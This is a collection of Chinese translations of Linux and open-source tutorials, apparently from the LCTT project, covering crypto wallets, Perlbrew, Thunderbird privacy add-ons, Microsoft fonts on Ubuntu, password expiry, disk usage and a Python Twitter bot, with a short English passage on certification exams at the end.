[2]:https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
[3]:https://aur.archlinux.org/
[4]:https://lists.archlinux.org/pipermail/aur-general/2018-July/034152.html
[5]:https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id=b3fec9f2f16703c2dae9e793f75ad6e0d98509bc
[6]:https://www.reddit.com/r/archlinux/comments/8x0p5z/reminder_to_always_read_your_pkgbuilds/e21iugg/
[7]:https://www.linuxuprising.com/2018/05/malware-found-in-ubuntu-snap-store.html
94
published/20180710 6 open source cryptocurrency wallets.md
Normal file
6 个开源的数字货币钱包
======

> 想寻找一个可以存储和交易你的比特币、以太坊和其它数字货币的软件吗?这里有 6 个开源的软件可以选择。

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/bus_cash_register.jpg?itok=7NKVKuPa)

没有数字货币钱包,像比特币和以太坊这样的数字货币只不过是又一个空想罢了。这些钱包对于保存、发送以及接收数字货币来说是必需的东西。

迅速成长的 [数字货币][1] 之所以是革命性的,都归功于它的去中心化:该网络中没有中央权威,每个人都享有平等的权力。开源技术是数字货币和 [区块链][2] 网络的核心所在。它使得这个充满活力的新兴行业能够从去中心化中获益 —— 比如,不可改变、透明和安全。

如果你正在寻找一个自由开源的数字货币钱包,请继续阅读,并开始探索以下选择能否满足你的需求。

### 1、 Copay

[Copay][3] 是一个能够很方便地存储比特币的开源数字货币钱包。这个软件以 [MIT 许可证][4] 发布。

Copay 服务器也是开源的。因此,开发者和比特币爱好者可以在服务器上部署他们自己的应用程序来完全控制他们的活动。

Copay 钱包能让你手中的比特币更加安全,而不必去信任不可靠的第三方。它允许你使用多重签名来批准交易,并且支持在同一个应用内存储多个独立的钱包。

Copay 可以在多种平台上使用,比如 Android、Windows、MacOS、Linux 和 iOS。

### 2、 MyEtherWallet

正如它的名字所示,[MyEtherWallet][5](缩写为 MEW)是一个以太坊钱包。它是开源的(遵循 [MIT 许可证][6])并且是完全在线的,可以通过 web 浏览器来访问它。

这个钱包的客户端界面非常简洁,它可以让你自信而安全地参与到以太坊区块链中。

### 3、 mSIGNA

[mSIGNA][7] 是一个功能强大的桌面版应用程序,用于在比特币网络上完成交易。它遵循 [MIT 许可证][8],并且在 MacOS、Windows 和 Linux 上可用。

这个区块链钱包可以让你完全控制你存储的比特币。其中一些特性包括用户友好性、灵活性、去中心化的离线密钥生成能力、加密的数据备份,以及多设备同步功能。

### 4、 Armory

[Armory][9] 是一个在你的计算机上产生和保管比特币私钥的开源钱包(遵循 [GNU AGPLv3][10])。它通过使用冷存储和支持多重签名的能力增强了安全性。

使用 Armory,你可以在完全离线的计算机上设置一个钱包;你可以通过<ruby>仅查看<rt>watch-only</rt></ruby>功能在因特网上查看你的比特币具体信息,这样有助于改善安全性。这个钱包也允许你去创建多个地址,并使用它们去完成不同的事务。

Armory 可用于 MacOS、Windows 和几个比较有特色的 Linux 平台上(包括树莓派)。

### 5、 Electrum

[Electrum][11] 是一个既对新手友好又具备专家功能的比特币钱包。它遵循 [MIT 许可证][12] 发行。

Electrum 可以在你的本地机器上使用较少的资源来本地加密你的私钥,支持冷存储,并且提供多重签名能力。

它在各种操作系统和设备上都可以使用,包括 Windows、MacOS、Android、iOS 和 Linux,并且也可以在像 [Trezor][13] 这样的硬件钱包中使用。

### 6、 Etherwall

[Etherwall][14] 是第一款可以在桌面计算机上存储和发送以太坊的钱包。它是一个遵循 [GPLv3 许可证][15] 的开源钱包。

Etherwall 非常直观而且速度很快。更重要的是,它增加了你的私钥安全性,你可以在一个全节点或瘦节点上来运行它。它作为全节点客户端运行时,可以允许你在本地机器上下载整个以太坊区块链。

Etherwall 可以在 MacOS、Linux 和 Windows 平台上运行,并且它也支持 Trezor 硬件钱包。

### 智者之言

自由开源的数字钱包在让更多的人快速上手数字货币方面扮演着至关重要的角色。

在你使用任何数字货币软件钱包之前,你一定要确保你的安全,而且一定要记住并完全遵循确保你的资金安全的最佳实践。

如果你喜欢的开源数字货币钱包不在以上的清单中,请在下面的评论区分享出你所知道的开源钱包。

--------------------------------------------------------------------------------

via: https://opensource.com/article/18/7/crypto-wallets

作者:[Dr.Michael J.Garbade][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[qhwdw](https://github.com/qhwdw)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://opensource.com/users/drmjg
[1]:https://www.liveedu.tv/guides/cryptocurrency/
[2]:https://opensource.com/tags/blockchain
[3]:https://copay.io/
[4]:https://github.com/bitpay/copay/blob/master/LICENSE
[5]:https://www.myetherwallet.com/
[6]:https://github.com/kvhnuke/etherwallet/blob/mercury/LICENSE.md
[7]:https://ciphrex.com/
[8]:https://github.com/ciphrex/mSIGNA/blob/master/LICENSE
[9]:https://www.bitcoinarmory.com/
[10]:https://github.com/etotheipi/BitcoinArmory/blob/master/LICENSE
[11]:https://electrum.org/#home
[12]:https://github.com/spesmilo/electrum/blob/master/LICENCE
[13]:https://trezor.io/
[14]:https://www.etherwall.com/
[15]:https://github.com/almindor/etherwall/blob/master/LICENSE
Perlbrew 入门
======

> 用 Perlbrew 在你的系统上安装多个版本的 Perl。

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/coffee_cafe_brew_laptop_desktop.jpg?itok=G-n1o1-o)

有比在系统上安装了 Perl 更好的事情吗?那就是在系统中安装了多个版本的 Perl。使用 [Perlbrew][1] 你可以做到这一点。但是为什么呢,除了让你包围在 Perl 下之外,有什么好处吗?

简短的回答是,不同版本的 Perl 是......不同的。程序 A 可能依赖于较新版本中不推荐使用的行为,而程序 B 需要去年还没有的新功能。如果你安装了多个版本的 Perl,则每个脚本都可以使用最适合它的版本。如果您是开发人员,这也会派上用场:你可以针对多个版本的 Perl 测试你的程序,这样无论你的用户运行什么,你都知道它能否工作。

### 安装 Perlbrew

另一个好处是 Perlbrew 会把 Perl 安装到用户的家目录。这意味着每个用户都可以管理他们的 Perl 版本(以及相关的 CPAN 包),而无需与系统管理员联系。自助服务意味着为用户提供更快的安装,并为系统管理员提供更多时间来解决难题。

第一步是在你的系统上安装 Perlbrew。许多 Linux 发行版已经在包仓库中提供了它,因此你只需要 `dnf install perlbrew`(或者适用于你的发行版的命令)。你还可以使用 `cpan App::perlbrew` 从 CPAN 安装 `App::perlbrew` 模块。或者你可以在 [install.perlbrew.pl][2] 下载并运行安装脚本。

### 安装新的 Perl 版本

假设你想尝试最新的开发版本(撰写本文时为 5.27.11)。首先,你需要安装这个包:

```
perlbrew install 5.27.11
```

### 切换 Perl 版本

现在你已经安装了新版本,你可以将它用于当前的 shell:

```
perlbrew use 5.27.11
```

或者你可以将其设置为你帐户的默认 Perl 版本(假设你按照 `perlbrew init` 的输出设置了你的配置文件):

```
perlbrew switch 5.27.11
```

### 运行单个脚本

你也可以用特定版本的 Perl 运行单个命令:

```
perlbrew exec 5.27.11 myscript.pl
```

或者,你可以针对所有已安装的版本运行命令。如果你想针对各种版本运行测试,这尤其方便。在这种情况下,请把版本指定为 `perl`:

```
perlbrew exec perl myscript.pl
```

### 安装 CPAN 模块

如果你想安装 CPAN 模块,`cpanm` 包是一个易于使用的界面,可以很好地与 Perlbrew 一起使用。用下面命令安装它:

```
perlbrew install-cpanm
```

然后,你可以使用 `cpanm` 命令安装 CPAN 模块:

```
cpanm CGI::simple
```

### 但是等下,还有更多!

本文介绍了基本的 Perlbrew 用法。还有更多功能和选项可供选择。可以从查看 `perlbrew help` 的输出开始,或查看 [App::perlbrew 文档][3]。你还喜欢 Perlbrew 的其他什么功能?请在评论中告诉我们。

--------------------------------------------------------------------------------

via: https://opensource.com/article/18/7/perlbrew

作者:[Ben Cotton][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[geekpi](https://github.com/geekpi)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
4 个提高你在 Thunderbird 上隐私的加载项
======

![](https://fedoramagazine.org/wp-content/uploads/2017/08/tb-privacy-addons-816x345.jpg)

Thunderbird 是由 [Mozilla][1] 开发的流行的免费电子邮件客户端。与 Firefox 类似,Thunderbird 提供了大量加载项来用于额外功能和自定义。本文重点介绍四个加载项,以改善你的隐私。

### Enigmail

使用 GPG(GNU Privacy Guard)加密电子邮件是保持其内容私密性的最佳方式。如果你不熟悉 GPG,请[查看我们在这里的入门介绍][2]。

[Enigmail][3] 是在 Thunderbird 中使用 OpenPGP 的首选加载项。实际上,Enigmail 与 Thunderbird 集成良好,可让你加密、解密、数字签名和验证电子邮件。

### Paranoia

[Paranoia][4] 可让你查看收到的电子邮件的重要信息。它用一个表情符号显示电子邮件在到达收件箱之前经过的服务器之间的加密状态。

黄色、快乐的表情告诉你所有连接都已加密。蓝色、悲伤的表情意味着有一个连接未加密。最后,红色、害怕的表情表示该消息在多个连接上未加密。

还有更多有关这些连接的详细信息,你可以用来检查哪台服务器用于投递邮件。

### Sensitivity Header

[Sensitivity Header][5] 是一个简单的加载项,可让你选择外发电子邮件的隐私级别。使用选项菜单,你可以选择敏感度:正常、个人、隐私和机密。

添加此标头不会为电子邮件增加额外的安全性。但是,某些电子邮件客户端或邮件传输/用户代理(MTA/MUA)可以使用此标头根据敏感度以不同方式处理邮件。

请注意,开发人员将此加载项标记为实验性的。
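作为补充说明,下面是一个假设性的 Python 小例子,与该加载项本身无关,仅用标准库 `email` 演示这种敏感度标头在邮件中是什么样子(地址均为虚构):

```python
from email.message import EmailMessage

# 构造一封带有 Sensitivity 标头的邮件;
# 支持该标头的 MTA/MUA 可以据此对邮件做不同处理
msg = EmailMessage()
msg["From"] = "sender@example.com"
msg["To"] = "recipient@example.com"
msg["Subject"] = "Quarterly report"
# 常见取值有 Personal、Private、Company-Confidential
msg["Sensitivity"] = "Company-Confidential"
msg.set_content("mail body goes here")

# 标头会按普通邮件头的形式出现在邮件顶部
print(msg["Sensitivity"])
```

实际发送仍需经过 SMTP 服务器,这里只演示标头的构造方式。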
### TorBirdy

如果你真的担心自己的隐私,[TorBirdy][6] 就是为你设计的加载项。它将 Thunderbird 配置为使用 [Tor][7] 网络。

据其[文档][8]所述,TorBirdy 为以前没有使用 Tor 的电子邮件帐户提供了少量隐私保护。

> 请记住,跟之前使用 Tor 访问的电子邮件帐户相比,之前没有使用 Tor 访问的电子邮件帐户提供**更少**的隐私/匿名/更弱的假名。但是,TorBirdy 仍然对现有帐户或实名电子邮件地址有用。例如,如果你正在寻求隐匿位置 —— 你经常旅行并且不想通过发送电子邮件来披露你的所有位置 —— TorBirdy 非常有效!

请注意,要使用此加载项,必须在系统上安装 Tor。

照片由 [Braydon Anderson][9] 在 [Unsplash][10] 上发布。

--------------------------------------------------------------------------------

via: https://fedoramagazine.org/4-addons-privacy-thunderbird/

作者:[Clément Verna][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[geekpi](https://github.com/geekpi)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://fedoramagazine.org
[1]:https://www.mozilla.org/en-US/
[2]:https://fedoramagazine.org/gnupg-a-fedora-primer/
[3]:https://addons.mozilla.org/en-US/thunderbird/addon/enigmail/
[4]:https://addons.mozilla.org/en-US/thunderbird/addon/paranoia/?src=cb-dl-users
[5]:https://addons.mozilla.org/en-US/thunderbird/addon/sensitivity-header/?src=cb-dl-users
[6]:https://addons.mozilla.org/en-US/thunderbird/addon/torbirdy/?src=cb-dl-users
[7]:https://www.torproject.org/
[8]:https://trac.torproject.org/projects/tor/wiki/torbirdy
[9]:https://unsplash.com/photos/wOHH-NUTvVc?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText
[10]:https://unsplash.com/search/photos/privacy?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText
在 Ubuntu 18.04 LTS 上安装 Microsoft Windows 字体
======

![](https://www.ostechnix.com/wp-content/uploads/2016/07/Install-Microsoft-Windows-Fonts-in-Ubuntu-1-720x340.png)

大多数教育机构仍在使用 Microsoft 字体,我不清楚其他国家是什么情况。但在泰米尔纳德邦(印度的一个州),**Times New Roman** 和 **Arial** 字体主要被用于大学和学校的几乎所有文档工作、项目和作业。不仅是教育机构,一些小型组织、办公室和商店也仍在使用 MS Windows 字体。以防万一,如果你需要在 Ubuntu 桌面版上使用 Microsoft 字体,请按照以下步骤安装。

**免责声明**:Microsoft 已免费发布其核心字体。但**请注意,Microsoft 字体禁止在其他操作系统中使用**。在任何 Linux 操作系统中安装 MS 字体之前,请仔细阅读 EULA。我们不对任何种类的盗版行为负责。

(LCTT 译注:本文只做技术探讨,并不代表作者、译者和本站鼓励任何行为。)

### 在 Ubuntu 18.04 LTS 桌面版上安装 MS 字体

如下所示安装 MS TrueType 字体:

```
$ sudo apt update
$ sudo apt install ttf-mscorefonts-installer
```

然后将会出现 Microsoft 的最终用户协议向导,点击 **OK** 以继续。

![][2]

![][3]

安装字体之后,我们需要使用命令行来更新字体缓存:

```
$ sudo fc-cache -f -v
```

**示例输出:**

```
/usr/share/fonts: caching, new cache contents: 0 fonts, 6 dirs
/usr/share/fonts/X11: caching, new cache contents: 0 fonts, 4 dirs
...
/home/sk/.cache/fontconfig: cleaning cache directory
/home/sk/.fontconfig: not cleaning non-existent cache directory
fc-cache: succeeded
```

### 在 Linux 和 Windows 双启动的机器上安装 MS 字体

如果你有 Linux 和 Windows 的双启动系统,你可以轻松地从 Windows C 驱动器上安装 MS 字体。你所要做的就是挂载 Windows 分区(C:/windows)。

我假设你已经在 Linux 中将 `C:\Windows` 分区挂载在了 `/Windowsdrive` 目录下。

现在,将字体位置链接到你的 Linux 系统的字体文件夹,如下所示:

```
ln -s /Windowsdrive/Windows/Fonts /usr/share/fonts/WindowsFonts
```

链接字体文件之后,使用命令行重新生成 fontconfig 缓存:

```
fc-cache
```

或者,将所有的 Windows 字体复制到 `/usr/share/fonts` 目录下并使用以下命令安装字体:

```
mkdir /usr/share/fonts/WindowsFonts
cp /Windowsdrive/Windows/Fonts/* /usr/share/fonts/WindowsFonts
chmod 755 /usr/share/fonts/WindowsFonts/*
```

最后,使用命令行重新生成 fontconfig 缓存:

```
fc-cache
```

### 测试 Windows 字体

安装 MS 字体后打开 LibreOffice 或 GIMP。现在,你将会看到 Microsoft coretype 字体。

![][4]

就是这样,希望这篇指南有用。我再次提醒你,在其他操作系统中使用 MS 字体是被禁止的。在安装 MS 字体之前请先阅读 Microsoft 许可协议。

如果你觉得我们的指南有用,请在你的社区、专业网络上分享并支持我们。还有更多好东西在等着我们。持续访问!

庆祝吧!!

--------------------------------------------------------------------------------

via: https://www.ostechnix.com/install-microsoft-windows-fonts-ubuntu-16-04/

作者:[SK][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[Auk7F7](https://github.com/Auk7F7)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
如何强制用户在下次登录 Linux 时更改密码
======

当你使用默认密码创建用户时,你必须强制用户在下一次登录时更改密码。

当你在一个组织中工作时,此选项是强制性的。因为老员工可能知道默认密码,他们可能会也可能不会用它尝试不当行为。

这是安全合规要求之一,所以,你必须确保以正确的方式处理此事,不出任何失误。即使是你的团队成员也要一样做。

大多数用户都很懒,除非你强迫他们更改密码,否则他们不会这样做。所以要把这件事作为惯例来执行。

出于安全原因,你需要经常更改密码,或者至少每个月更换一次。

确保你使用的是难以猜测的密码(大小写字母、数字和特殊字符的组合)。它至少应该为 10-15 个字符。

我们运行了一个 shell 脚本来在 Linux 服务器中创建用户账户,它会自动为用户设置一个密码,密码是实际用户名和少量数字的组合。

我们可以通过使用以下两种方法来实现这一点:

  * passwd 命令
  * chage 命令

**建议阅读:**

- [如何在 Linux 上检查用户所属的组][1]
- [如何在 Linux 上检查创建用户的日期][2]
- [如何在 Linux 中重置/更改用户密码][3]
- [如何使用 passwd 命令管理密码过期和老化][4]

### 方法 1:使用 passwd 命令

`passwd` 的意思是“密码”。它用于更新用户的身份验证令牌。`passwd` 命令/实用程序用于设置、修改或更改用户的密码。

普通用户只能更改自己账户的密码,但超级用户可以更改任何账户的密码。

此外,我们还可以使用其他选项执行其他操作,例如删除用户密码、锁定或解锁用户账户、设置用户账户的密码过期时间等。

在 Linux 中,这是通过调用 Linux-PAM 和 Libuser API 执行的。

在 Linux 中创建用户时,用户详细信息将存储在 `/etc/passwd` 文件中。`passwd` 文件将每个用户的详细信息保存为带有七个字段的单行。

此外,在 Linux 系统中创建新用户时,将更新以下四个文件。

  * `/etc/passwd`:用户详细信息将在此文件中更新。
  * `/etc/shadow`:用户密码信息将在此文件中更新。
  * `/etc/group`:新用户的组详细信息将在此文件中更新。
  * `/etc/gshadow`:新用户的组密码信息将在此文件中更新。
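为了说明上面提到的七个字段,下面是一个假设性的 Python 小示意,把一行 `/etc/passwd` 风格的记录按冒号拆开(示例数据为虚构):

```python
# /etc/passwd 的每行记录由 7 个以冒号分隔的字段组成
line = "magesh:x:1001:1001:2g Admin - Magesh M:/home/magesh:/bin/bash"

names = ["用户名", "密码占位符", "UID", "GID", "备注(GECOS)", "主目录", "登录 shell"]
fields = line.strip().split(":")
record = dict(zip(names, fields))

for name, value in record.items():
    print(f"{name}: {value}")
```

其中第二个字段只是占位符 `x`,真正的密码散列保存在 `/etc/shadow` 中。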
#### 如何使用 passwd 命令执行此操作

我们可以使用 `passwd` 命令并添加 `-e` 选项来执行此操作。

为了测试这一点,让我们创建一个新用户账户,看看它是如何工作的。

```
# useradd -c "2g Admin - Magesh M" magesh && passwd magesh
Changing password for user magesh.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
```

使该用户账户的密码失效,那么在下次登录尝试期间,用户将被迫更改密码。

```
# passwd -e magesh
Expiring password for user magesh.
passwd: Success
```

当我第一次尝试使用此用户登录系统时,它要求我设置一个新密码。

```
login as: magesh
magesh@localhost's password:
You are required to change your password immediately (root enforced)
WARNING: Your password has expired.
You must change your password now and login again!
Changing password for user magesh.
Changing password for magesh.
(current) UNIX password:
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
Connection to localhost closed.
```

### 方法 2:使用 chage 命令

`chage` 意即“改变年龄”(change age)。它会更改用户密码过期信息。

`chage` 命令可以设置自上次修改密码之日起、到必须再次修改密码之间的天数。系统使用此信息来确定用户何时必须更改他/她的密码。

它还允许用户执行其他操作,例如设置账户到期日期、到期后设置密码失效、显示账户过期信息、设置密码更改前的最小和最大天数以及设置到期警告天数。

#### 如何使用 chage 命令执行此操作

让我们在 `chage` 命令的帮助下,通过添加 `-d` 选项执行此操作。

为了测试这一点,让我们创建一个新用户账户,看看它是如何工作的。我们将创建一个名为 `thanu` 的用户账户。

```
# useradd -c "2g Editor - Thanisha M" thanu && passwd thanu
Changing password for user thanu.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
```

要实现这一点,请使用 `chage` 命令将用户的上次密码更改日期设置为 0。

```
# chage -d 0 thanu

# chage -l thanu
Last password change : Jul 18, 2018
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : 0
Maximum number of days between password change : 99999
Number of days of warning before password expires : 7
```
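顺便一提,`chage -d` 修改的是 `/etc/shadow` 中“上次修改密码日期”字段,该字段以“自 1970-01-01 起的天数”表示;`-d 0` 就是把它置为 0,系统因此认为密码早已过期。下面是一个假设性的 Python 换算示意:

```python
from datetime import date, timedelta

EPOCH = date(1970, 1, 1)

def days_to_date(days):
    """把 /etc/shadow 中的“天数”字段换算成日期。"""
    return EPOCH + timedelta(days=days)

def date_to_days(d):
    """把日期换算回 shadow 文件中使用的天数。"""
    return (d - EPOCH).days

# chage -d 0 写入 0,相当于“上次修改密码”发生在 1970-01-01,
# 于是系统认为密码早已过期,用户下次登录时必须更改密码
print(days_to_date(0))
# “Jul 18, 2018” 这样的日期对应的天数:
print(date_to_days(date(2018, 7, 18)))
```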
当我第一次尝试使用此用户登录系统时,它要求我设置一个新密码。

```
login as: thanu
thanu@localhost's password:
You are required to change your password immediately (root enforced)
WARNING: Your password has expired.
You must change your password now and login again!
Changing password for user thanu.
Changing password for thanu.
(current) UNIX password:
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
Connection to localhost closed.
```

--------------------------------------------------------------------------------

via: https://www.2daygeek.com/how-to-force-user-to-change-password-on-next-login-in-linux/

作者:[Prakash Subramanian][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[MjSeven](https://github.com/MjSeven)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://www.2daygeek.com/author/prakash/
[1]:https://www.2daygeek.com/how-to-check-which-groups-a-user-belongs-to-on-linux/
[2]:https://www.2daygeek.com/how-to-check-user-created-date-on-linux/
[3]:https://www.2daygeek.com/passwd-command-examples/
[4]:https://www.2daygeek.com/passwd-command-examples-part-l/
如何检查 Linux 中的可用磁盘空间
======

> 用这里列出的方便的工具来跟踪你的磁盘利用率。

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/find-file-linux-code_magnifying_glass_zero.png?itok=E2HoPDg0)

跟踪磁盘利用率信息是系统管理员(和其他人)的日常待办事项之一。Linux 有一些内置的实用程序来帮助提供这些信息。

### df

`df -h` 以人类可读的格式显示磁盘空间。

`df -a` 显示文件系统的完整磁盘使用情况,即使 Available(可用)字段为 0。

![](https://opensource.com/sites/default/files/uploads/df-ha.png)

`df -T` 显示磁盘使用情况以及每个块的文件系统类型(例如,xfs、ext2、ext3、btrfs 等)。

`df -i` 显示已使用和未使用的 inode。

![](https://opensource.com/sites/default/files/uploads/df-ti.png)

### du

`du` 显示文件、目录等的磁盘使用情况,默认情况下以 KB 为单位显示。

`du -h` 以人类可读的方式显示所有目录和子目录的磁盘使用情况。

`du -a` 显示所有文件的磁盘使用情况。

`du -s` 提供特定文件或目录使用的总磁盘空间。

![](https://opensource.com/sites/default/files/uploads/du-has.png)
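如果想在脚本里以编程方式取得类似 `df` 的数据,也可以用 Python 标准库的 `shutil.disk_usage`。下面是一个最小示意(以根目录 `/` 为例):

```python
import shutil

def human(n):
    """把字节数转成类似 df -h 的人类可读格式。"""
    for unit in ("B", "K", "M", "G", "T"):
        if n < 1024:
            return f"{n:.1f}{unit}"
        n /= 1024
    return f"{n:.1f}P"

# disk_usage 返回指定路径所在文件系统的总量、已用量和可用量(单位:字节)
usage = shutil.disk_usage("/")
print(f"总量: {human(usage.total)}  已用: {human(usage.used)}  可用: {human(usage.free)}")
```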
### ls -al

`ls -al` 列出了特定目录的全部内容及大小。

![](https://opensource.com/sites/default/files/uploads/ls-al.png)

### stat

`stat <文件/目录>` 显示文件/目录或文件系统的大小和其他统计信息。

![](https://opensource.com/sites/default/files/uploads/stat.png)

### fdisk -l

`fdisk -l` 显示磁盘大小以及磁盘分区信息。

![](https://opensource.com/sites/default/files/uploads/fdisk.png)

这些是用于检查 Linux 文件空间的大多数内置实用程序。有许多类似的工具,如 [Disks][1](GUI 工具)、[Ncdu][2] 等,它们也可以显示磁盘空间的利用率。你有不在这个列表上的最喜欢的工具吗?请在评论中分享。

--------------------------------------------------------------------------------

via: https://opensource.com/article/18/7/how-check-free-disk-space-linux

作者:[Archit Modi][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[MjSeven](https://github.com/MjSeven)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
学习如何使用 Python 构建你自己的 Twitter 机器人
======

![](https://fedoramagazine.org/wp-content/uploads/2018/07/twitterbot-816x345.jpg)

Twitter 允许用户将博客帖子和文章[分享][1]给全世界。使用 Python 和 Tweepy 库,创建一个 Twitter 机器人来接管你的所有推文变得非常简单。这篇文章告诉你如何去构建这样一个机器人。希望你能将这些概念同样应用到其他在线服务的项目中去。

### 开始

[tweepy][2] 库可以让创建一个 Twitter 机器人的过程更加容易上手。它包含了 Twitter 的 API 调用和一个很简单的接口。

下面这些命令使用 `pipenv` 在一个虚拟环境中安装 tweepy。如果你没有安装 `pipenv`,可以看一看我们之前的文章[如何在 Fedora 上安装 Pipenv][3]。

```
$ mkdir twitterbot
$ cd twitterbot
$ pipenv --three
$ pipenv install tweepy
$ pipenv shell
```

### Tweepy —— 开始

要使用 Twitter API,机器人需要通过 Twitter 的授权。为了解决这个问题,tweepy 使用了 OAuth 授权标准。你可以通过在 <https://apps.twitter.com/> 创建一个新的应用来获取到凭证。

#### 创建一个新的 Twitter 应用

当你填完了表格并点击了“<ruby>创建你自己的 Twitter 应用<rt>Create your Twitter application</rt></ruby>”的按钮后,你可以获取到该应用的凭证。Tweepy 需要<ruby>用户密钥<rt>API Key</rt></ruby>和<ruby>用户密码<rt>API Secret</rt></ruby>,这些都可以在 “<ruby>密钥和访问令牌<rt>Keys and Access Tokens</rt></ruby>” 中找到。

![][4]

向下滚动页面,使用“<ruby>创建我的访问令牌<rt>Create my access token</rt></ruby>”按钮生成一个“<ruby>访问令牌<rt>Access Token</rt></ruby>”和一个“<ruby>访问令牌密钥<rt>Access Token Secret</rt></ruby>”。

#### 使用 Tweepy —— 输出你的时间线

现在你已经有了所需的凭证了,打开一个文件,并写下如下的 Python 代码。

```
import tweepy

auth = tweepy.OAuthHandler("your_consumer_key", "your_consumer_key_secret")
auth.set_access_token("your_access_token", "your_access_token_secret")

api = tweepy.API(auth)

public_tweets = api.home_timeline()
for tweet in public_tweets:
    print(tweet.text)
```

在确保你正在使用你的 Pipenv 虚拟环境后,执行你的程序。

```
$ python tweet.py
```

上述程序调用了 `home_timeline` 方法来获取到你时间线中最近的 20 条推文。现在这个机器人能够使用 tweepy 来获取到 Twitter 的数据,接下来尝试修改代码来发送推文。

#### 使用 Tweepy —— 发送一条推文

要发送一条推文,有一个容易上手的 API 方法 `update_status`。它的用法很简单:

```
api.update_status("The awesome text you would like to tweet")
```

Tweepy 还为制作 Twitter 机器人准备了非常多不同的有用方法。要获取 API 的详细信息,请查看[文档][5]。

### 一个杂志机器人

接下来我们来创建一个机器人,它会搜索 Fedora Magazine 的推文并转推它们。

为了避免多次转推相同的内容,这个机器人保存了最近一条转推的推文的 ID。两个助手函数 `store_last_id` 和 `get_last_id` 将会帮助存储和读取这个 ID。

然后,机器人使用 tweepy 搜索 API 来查找 Fedora Magazine 的最近的推文并存储这个 ID。

```
import tweepy


def store_last_id(tweet_id):
    """ Stores a tweet id in text file """
    with open('lastid', 'w') as fp:
        fp.write(str(tweet_id))


def get_last_id():
    """ Retrieve the list of tweets that were
        already retweeted """
    with open('lastid') as fp:
        return fp.read()


if __name__ == '__main__':

    auth = tweepy.OAuthHandler("your_consumer_key", "your_consumer_key_secret")
    auth.set_access_token("your_access_token", "your_access_token_secret")

    api = tweepy.API(auth)

    try:
        last_id = get_last_id()
    except FileNotFoundError:
        print("No retweet yet")
        last_id = None

    for tweet in tweepy.Cursor(api.search, q="fedoramagazine.org", since_id=last_id).items():
        if tweet.user.name == 'Fedora Project':
            store_last_id(tweet.id)
            #tweet.retweet()
            print(f'"{tweet.text}" was retweeted')
```

为了只转推 Fedora Magazine 的推文,机器人搜索内容包含 fedoramagazine.org、且由 “Fedora Project” Twitter 账户发布的推文。

### 结论

在这篇文章中你看到了如何使用 tweepy 的 Python 库来创建一个自动阅读、发送和搜索推文的 Twitter 应用。现在,你可以发挥自己的创造力,创造一个你自己的 Twitter 机器人。

这篇文章的演示源码可以在 [Github][6] 找到。

--------------------------------------------------------------------------------

via: https://fedoramagazine.org/learn-build-twitter-bot-python/

作者:[Clément Verna][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[Bestony](https://github.com/bestony)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://fedoramagazine.org
[1]:https://twitter.com
[2]:https://tweepy.readthedocs.io/en/v3.5.0/
[3]:https://linux.cn/article-9827-1.html
[4]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-19-20-17-17.png
[5]:http://docs.tweepy.org/en/v3.5.0/api.html#id1
[6]:https://github.com/cverna/magabot
translating by wyxplus

CIP: Keeping the Lights On with Linux
======
Open Source Certification: Preparing for the Exam
======

Open source is the new normal in tech today, with open components and platforms driving mission-critical processes at organizations everywhere. As open source has become more pervasive, it has also profoundly impacted the job market. Across industries [the skills gap is widening, making it ever more difficult to hire people][1] with much needed job skills. That's why open source training and certification are more important than ever, and this series aims to help you learn more and achieve your own certification goals.

In the [first article in the series][2], we explored why certification matters so much today. In the [second article][3], we looked at the kinds of certifications that are making a difference. This story will focus on preparing for exams, what to expect during an exam, and how testing for open source certification differs from traditional types of testing.

Clyde Seepersad, General Manager of Training and Certification at The Linux Foundation, stated, "For many of you, if you take the exam, it may well be the first time that you've taken a performance-based exam and it is quite different from what you might have been used to with multiple choice, where the answer is on screen and you can identify it. In performance-based exams, you get what's called a prompt."

As a matter of fact, many Linux-focused certification exams literally prompt test takers at the command line. The idea is to demonstrate skills in real time in a live environment, and the best preparation for this kind of exam is practice, backed by training.

### Know the requirements

"Get some training," Seepersad emphasized. "Get some help to make sure that you're going to do well. We sometimes find folks have very deep skills in certain areas, but then they're light in other areas. If you go to the website for [Linux Foundation training and certification][4], for the [LFCS][5] and the [LFCE][6] certifications, you can scroll down the page and see the details of the domains and tasks, which represent the knowledge areas you're supposed to know."

